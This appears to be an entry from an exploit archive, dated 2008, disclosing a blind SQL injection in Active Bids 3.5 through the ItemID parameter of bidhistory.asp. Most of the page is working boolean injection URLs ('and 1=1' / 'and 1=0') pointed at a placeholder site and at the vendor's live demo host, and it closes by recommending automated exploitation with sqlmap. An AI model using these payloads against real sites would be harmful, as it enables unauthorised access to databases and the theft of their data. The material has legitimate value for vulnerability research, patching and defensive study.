[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Active Bids 3.5 (ItemID) Blind SQL Injection Vulnerability
# Published : 2008-11-29
# Author : Stack
# Previous Title : Active Web Mail v 4 Blind SQL Injection Vulnerability
# Next Title : OpenForum 0.66 Beta Remote Reset Admin Password Exploit


[~]Tybe     : Remote Blind SQL Injection Vulnerability
   
 [~]Vendor   : www.activewebsoftwares.com
   
 [~]Software : Active Bids
   
 [~]author   : Mountassif Moad



http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1

http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0

Demo :

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0


# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...

# www.Syue.com [2008-11-29]